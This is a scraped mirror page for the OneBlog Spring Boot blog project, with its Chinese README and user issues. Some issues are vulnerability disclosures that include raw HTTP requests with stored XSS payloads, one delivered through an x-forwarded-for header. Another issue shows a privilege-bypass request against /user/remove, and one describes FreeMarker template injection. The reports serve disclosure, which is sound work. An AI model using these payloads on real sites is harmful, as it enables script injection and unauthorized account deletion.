zhangyd-c / oneblog Goto Github PK

View Code? Open in Web Editor NEW

1.0K 42.0 377.0 10.43 MB

:alien: OneBlog，一个简洁美观、功能强大并且自适应的Java博客

Home Page: https://docs.zhyd.me

License: GNU General Public License v3.0

Java 45.37% CSS 10.96% JavaScript 12.89% FreeMarker 30.67% Shell 0.05% Dockerfile 0.06%

springboot blog dblog spring-boot bootstrap wangeditor oneblog qiniu spider blog-hunter

oneblog's Introduction

OneBlog 一个简洁美观、功能强大并且自适应的Java博客。使用springboot开发，前端使用Bootstrap。支持移动端自适应，配有完备的前台和后台管理功能。

开源地址： Gitee | Github

QQ群：230017570

重要声明

看文档！看文档！看文档！，初次使用，请先看文档！

本项目配有相关帮助文档。文档中包括基本的项目说明、shiro标签使用、七牛云配置和一些常见的异常问题解决方案。使用时碰到问题请优先查阅【帮助文档】。因为现在好多朋友问的问题大部分都写在【帮助文档】中了，希望各位朋友能自己翻阅下相关资料，高效提问，避免重复问题！
提问题前请优先阅读【如何向开源社区提问题】&【提问的智慧】
提问题时请优先选择Gitee Issues（方便问题追踪和一对一解决），其次我的博客-留言板，再次QQ群（QQ群消息较多，提问请注意节奏、时机），最次加我QQ好友直接提问（不推荐）
本项目唯一官网：https://docs.zhyd.me
本项目开源地址：Gitee | Github
本项目修改记录，详情请移步这里
如果你想贡献代码，请先阅读这篇文章

写在前面的话

ps: 虽然我知道，大部分人都是来了直接下载源代码后就潇洒的离开，并且只有等到下次突然想到“我天~~我得去看看OneBlog这烂项目更新新功能了吗”的时候才会重新来到这儿，即使你重新来过，我估计你也只有两个选择：

发现更新代码了 --> 下载源码后重复上面的步骤
发现没更新代码 --> 直接关闭浏览器

虽然我知道现实就是如此的残酷，但我还是要以我萤虫之力对各位到来的同仁发出一声诚挚的嘶吼：

如果喜欢，请多多分享！！多多Star！！

功能简介

Docker一键部署：支持 Docker 的方式一键启动服务
广告位管理：支持五种广告位：首页开屏广告、侧边栏顶部、侧边栏底部、文章详情底部、评论框顶部，站长可以随时随意更换自己的广告链接，赚外快不成问题！
多种编辑器：支持 wangEditor、Markdown 和 TinyMCE 等多种文章编辑器，可以自行选择
自动申请友情链接：在线申请友情链接，无需站长手动配置，只需申请方添加完站长的连接后自行申请即可
百度推送：支持百度推送功能，加速百度搜索引擎收录博文
评论系统：自研的评论系统，支持显示用户地址、浏览器和 os 信息，后台可审核评论、开启匿名评论、回复和邮件通知评论
权限管理：后台配备完善的 RBAC 权限管理，前台文章支持密码访问、登录访问等多种权限验证策略
完善的 SEO 方案：自带robots、sitemap 等 seo 模板，实现自动生成 robots 和 sitemap
实时通讯：管理员可向在线的用户实时发送消息
系统配置支持快速配置：可通过后台手动修改诸如域名信息、SEO 优化、赞赏码、七牛云以及更新维护通知等
多种文件存储：集成七牛云、阿里云OSS，实现文件云存储，同时支持本地文件存储
文章搬运工：集成blog-hunter 实现“文章搬运工”功能，支持一键同步imooc、csdn、iteye或者cnblogs上的文章，可抓取列表和单个文章
第三方授权登录：集成 JustAuthPlus（JAP）实现第三方授权登录
自定义网站内容：管理员可自定义“关于本站”、“留言板”、“友情链接”、“免责声明”、“Footer”、“鼠标点击时的气泡文字”、“热门搜索的待选项”等内容
自定义页面：管理员可添加自定义的页面
流控：针对异常IP的连续大量访问，系统会自动封禁该IP。

模块划分

模块	释义	备注
blog-core	核心业务类模块，提供基本的数据操作、工具处理等	该模块只是作为核心依赖包存在
blog-codegen	代码生成器
blog-admin	后台管理模块	该模块作为单独项目打包部署
blog-web	前台模块	该模块作为单独项目打包部署
blog-file	文件存储功能模块	支持local、七牛云和阿里云OSS

技术栈

docker
docker-compose
Springboot 2.3.4.RELEASE
Apache Shiro 1.7.1
Logback
Redis
Lombok
Websocket
MySQL、Mybatis、Mapper、Pagehelper
Freemarker
Bootstrap 3.3.0
wangEditor
Markdown
jQuery 1.11.1、jQuery Lazyload 1.9.7、fancybox、iCheck
阿里云OSS
七牛云
Nginx
kaptcha
webMagic
...

快速开始

Docker Compose（推荐）

Compose 是用于定义和运行多容器 Docker 应用程序的工具。通过 Compose，您可以使用 YML 文件来配置应用程序需要的所有服务。然后，使用一个命令，就可以从 YML 文件配置中创建并启动所有服务。使用之前需要先安装docker环境，建议版本为17.06.0-ce以上版本

下载源码，安装maven环境，打包项目 mvn clean package -Dmaven.test.skip=true -Pdev，放到服务器
进入 docs/docker 目录
按照注释修改 .env 文件
执行 docker-compose -p oneblog up -d

源码方式

blog-web 和 blog-admin 的运行方式一样

使用IDE导入本项目
新建数据库CREATE DATABASE dblog;
导入数据库docs/docker/mysql/dblog.sql
初始化数据库docs/docker/mysql/init_data.sql
修改配置文件，mysql、redis、mail配置在[blog-core]/resources/config/application-center.yml配置文件中
运行项目：直接运行 blog-web/src/main/java/com/zyd/blog/BlogWebApplication.java 或者 blog-admin/src/main/java/com/zyd/blog/BlogAdminApplication.java
浏览器访问http://127.0.0.1:{port}

后台默认账号密码：root/123456

Who is using?

烦请各位使用 OneBlog 的朋友，能留下你的网址 - 点这儿

预览

交流

微信(备注:加群)	公众号

QQ群

1群
2群

赞助

为了让OneBlog更好用，作者码代码码的头发都没了！请作者买块生姜擦擦头皮，据说这样有助于生发~~

支付宝	微信	支付宝红包

生命不息，折腾不止！更多信息，请关注：

特别感谢

广大的开源爱好者
无私的网友
gentelella: 一款开源的Bootstrap3后台管理模板
七牛云: 强大的对象存储、CDN等服务提供商
emoji表情列表: emoji表情列表
blog-hunter: 博客猎手，基于webMagic的博客爬取工具，支持慕课、csdn、iteye、cnblogs、掘金和V2EX等各大主流博客平台。
JustAuth: 史上最全的整合第三方登录的工具,目前已支持Github、Gitee、微博、钉钉、百度、Coding、腾讯云开发者平台、OSChina、支付宝、QQ、微信、淘宝、Google、Facebook、抖音、领英、小米、微软和今日头条等第三方平台的授权登录。 Login, so easy!
JAP: 一款开源的登录认证中间件，基于模块化设计，并且与业务高度解耦，使用起来非常灵活，开发者可以毫不费力地将 JAP 集成到任何 web 应用程序中，就像集成 JustAuth 一样，简单方便。
待续...

开源协议

oneblog's People

Contributors

Stargazers

Watchers

Forkers

sweeter-box jackshine jiaxilee willliuwx febregaz lieight fengchj10 mijingling chenyongpeng neozjc frankfsm wunanliang gmingsoft04 sunkang345 xingshy mylovetop palagend a-superjack 847689421 javayiyi skyscrapertwc wrrgit mrbluesky888 jesusjiyuan sdtm1016 yxp1992 laidu823 xueyuqing613 wylc system63mush malone91 face-sea robin536180 siblesos magic-coder readreamer23 marcoxiaozhou wenwangzhishang kangdengfeng leaderyangzi linsng gitwangxi huangdehui2013 nshgdq yidaibawang zkydrx izheng guangjie0916 jayfeihe jevno dongyan19960701 angryid 1ffree toolsqacn zhangql09085 vicioushare objectnotfoundexception leonbeau dream250 redfeng dylan8888 angry-shark dd121011 timmyds dave1453629500 goodaswater bilibilie 1179175893 detoandy johndoeo doanhoa93 pingidm cruddev qiailin 20160805xcy dailyenrich hanmichael myungsinkim daming66 karcialiang hhy5277 bobo41 wenlincheng rockystevejobs inetty wzh70190 zhangtao3 lrgo fenglinupc xcxzzx-1 vipamp huowolf juncheng210 wno704 gloryxu donaldjohn twx211553 cookiegkl crxsunshine daphniscc

oneblog's Issues

关于爬取文章遇到的问题，望给予思路

在爬取文章时，不知道哪里出现了问题，导致爬取不到文章，其内容如下，全是null

程序正在初始化...
[ hunter ] null -- null -- null
[ hunter ] [ save ] Succeed! null
[ hunter ] [ sync tags ] Succeed! null
[ hunter ] bye~~

此问题是什么引起的呢？

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
af7da343fe35 nginx "/docker-entrypoint.…" 12 minutes ago Up 12 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp nginx
3804c9599f78 justauth/blog-web "java -jar app.jar -…" About an hour ago Up 45 minutes 8085/tcp, 0.0.0.0:8085->8443/tcp, :::8085->8443/tcp blog-web
e675efe0d5b8 justauth/blog-admin "java -jar app.jar -…" About an hour ago Up 45 minutes 0.0.0.0:8086->8085/tcp, :::8086->8085/tcp blog-admin
9c2e59edfd52 justauth/blog-mysql "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 33060/tcp, 0.0.0.0:3307->3306/tcp, :::3307->3306/tcp blog-mysql
eb33133d0abb redis "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 0.0.0.0:6380->6379/tcp, :::6380->6379/tcp blog-redis

There is a stored xss vulnerability exists in OneBlog- <=2.2.8

Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
Access the add function in the operation tab list in the background, and then inject

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
OneBlog- <=2.2.8

[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote

[Impact Code execution]
true

后台所有的更新不可用，提示成功，但是没有成功？？？

是不是缓存？？？

Redis连接失败

2019-10-29 22:06:45 [org.apache.juli.logging.DirectJDKLog:182] ERROR - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [redis.clients.jedis.exceptions.JedisConnectionException: Could not get a resource from the pool] with root cause
java.net.ConnectException: Connection refused (Connection refused)
at java.net.PlainSocketImpl.socketConnect(Native Method)
at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:350)
at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:206)
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:188)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)

您好，有时候更新操作实际上是不成功的

提示更新成功，但实际上是失败的，例如：
1、在系统设置中，先更新基本信息的站点简介，更新成功，再不刷新当前页面的情况下，编辑登陆下的登陆重试次数，编辑完后提交保存，提示成功，但实际上，并未成功，没有进行更新操作，但会记录修改系统配置的日志。
2、在权限管理中，角色管理，编辑角色信息提示成功，实际未成功，但会记录编辑角色配置的日志。实际执行的sql是
Preparing: UPDATE sys_role SET id = id,update_time = ? WHERE id = ?
Parameters: 2019-08-12 10:52:43.904(Timestamp), null
3、在权限管理中，资源管理，和第二个是一个问题，编辑提示成功，实际未成功
4、在用户列表中，用户列表，和第二个是一个问题，编辑提示成功，实际未成功
5、文章搬运工，封面图未转换成指定地址，依旧是原地址
6、网站管理中，更新日志中，和第二个是一个问题，编辑提示成功，实际未成功
7、网站管理中，公告管理中，和第二个是一个问题，编辑提示成功，实际未成功
8、网站管理中，友情链接中，和第二个是一个问题，编辑提示成功，实际未成功
8、网站管理中，模板管理中，和第二个是一个问题，编辑提示成功，实际未成功
9、文章管理中，文章列表中，推送到百度站长平台功能，当推送提示失败时，信息“site error”，再次点击推送按钮，提示失败，这时信息是“请至少选择一条记录”，实际上是选择了数据，应该再次提示信息“site error”
10、文章管理中，标签列表中，和第二个是一个问题，编辑提示成功，实际未成功
11、文章管理中，分类列表中，和第二个是一个问题，编辑提示成功，实际未成功
目前遇到这些问题，好像所有编辑功能有问题，是我克隆代码问题嘛？望作者回复，谢谢。
同时，感谢作者开源这么好项目。

博客id错误问题

博客id大于999以后，上一篇和下一篇的id错误。例如1234 会变成1,234
点击以后，后台出错

‘’‘
2019-05-19 22:32:54 [com.zyd.blog.framework.advice.ExceptionHandleController:72] ERROR - url参数异常，请检查参数类型是否匹配！
org.springframework.web.method.annotation.MethodArgumentTypeMismatchException: Failed to convert value of type 'java.lang.String' to required type 'java.lang.Long'; nested exception is java.lang.NumberFormatException: For input string: "6,873"
’‘’

‘’‘
Caused by: java.lang.NumberFormatException: For input string: "6,873"
at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)
’‘’

【项目自荐】: ❤️一个基于Springboot的个人博客

一个基于SpringBoot的简洁优雅的个人博客

项目地址：https://github.com/shaoxiongdu/blog
在线演示地址: http://www.shaoxiongdu.cn

文件管理页面，存储阿里云的图片鼠标移动会黑屏

属于阿里云存储的鼠标来回动，页面会变黑，七牛云没事

blog-admin是不是忘上传啦？

老哥，刚在spring4all看到你的博客，觉得还不错哦。
我看你介绍里面有三个工程，but没有blog-admin哦，是不是忘上传啦

请问freemarker用在哪些地方呢

请问freemarker用在哪些地方呢？有什么思路可以设置全站html静态化吗，谢谢解答

Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8

Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
Access the add function in the operation tab list in the background, and then inject

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
OneBlog- <=2.2.8

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote

[Impact Code execution]
true

These are two storage XSS vulnerabilities

There are two XSS vulnerabilities in article reviews.

Vulnerability code:
IpUtil

public static String getRealIp(HttpServletRequest request) {
        String ip = request.getHeader("x-forwarded-for");
        return checkIp(ip) ? ip : (
                checkIp(ip = request.getHeader("Proxy-Client-IP")) ? ip : (
                        checkIp(ip = request.getHeader("WL-Proxy-Client-IP")) ? ip :
                                request.getRemoteAddr()));
}

Getting IP from x-forwarded-for without filtering.Then an XSS vulnerability will occur when the output is made.

Second places

crafted url in POST data to api/comment.There is a problem with the filtering rules.

Vulnerability code:
HtmlUtil

public static String html2Text(String content) {
        if (StringUtils.isEmpty(content)) {
            return "";
        }
        String regEx_html = "<[^>]+>";
        content = content.replaceAll(regEx_html, "").replaceAll(" ", "");
        content = content.replaceAll("&quot;", "\"")
                .replaceAll("&nbsp;", "")
                .replaceAll("&amp;", "&")
                .replaceAll("\n", " ")
                .replaceAll("&#39;", "\'")
                .replaceAll("&lt;", "<")
                .replaceAll("&gt;", ">")
                .replaceAll("[ \\f\\t\\v]{2,}", "\t");

        String regEx = "<.+?>";
        Pattern pattern = Pattern.compile(regEx);
        Matcher matcher = pattern.matcher(content);
        content = matcher.replaceAll("");
        return content.trim();
    }

Payload

POST /api/comment HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 181
Accept: /
Origin: http://127.0.0.1:8443
X-Requested-With: XMLHttpRequest
User-Agent: Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-forwarded-for:111.111.111.111<script>alert('xss-thiscode01')</script>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

pid=0&content=hello hello&avatar=https%3A%2F%2Fq1.qlogo.cn%2Fg%3Fb%3Dqq%26nk%3D111%26s%3D40&qq=12345&nickname=jack01&email=111%40qq.com&url=javascript:alert('xss-thiscode02');&sid=1

XSS vulnerability will be launched.

Enter the Background Comment Management List.The first XSS automatic trigger.

The second XSS click jack01 can trigger.

Ask the author to fix this vulnerability.Thanks.

关于项目存在FreeMarker模板注入实现远程命令执行问题

您好，该项目中可能存在FreeMarker模板注入实现远程命令执行问题的风险。

在项目后台存在模板管理功能，并且可以任意修改模板。

成功修改了数据库中的模板数据。

之后前台访问url/sitemap.xml，成功触发命令执行

解决办法j
建议对修改的模块的地方进行过滤处理。

There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8

[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
<= 2.2.8

[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close

ids= 3（The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value）

[Attack Type]
Remote

[Vulnerability details]

first, prepare two test accounts with different levels.
Senior administrator admin

Low level administrator root123

Step 2: log in to the system with root123 and enter the user management page

Step 3: click the delete button to directly delete the administrator user admin

Delete succeeded！

In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)

The first step is to log in to the background with root123 account and enter user management.

Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test

You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.

Delete succeeded！

zhangyd-c / oneblog Goto Github PK

oneblog's Introduction

重要声明

写在前面的话

功能简介

模块划分

技术栈

快速开始

Docker Compose（推荐）

源码方式

Who is using?

预览

交流

赞助

生命不息，折腾不止！ 更多信息，请关注：

特别感谢

开源协议

oneblog's People

Contributors

Stargazers

Watchers

Forkers

oneblog's Issues

一个基于SpringBoot的简洁优雅的个人博客

Payload

Recommend Projects

Recommend Topics

Recommend Org

生命不息，折腾不止！更多信息，请关注：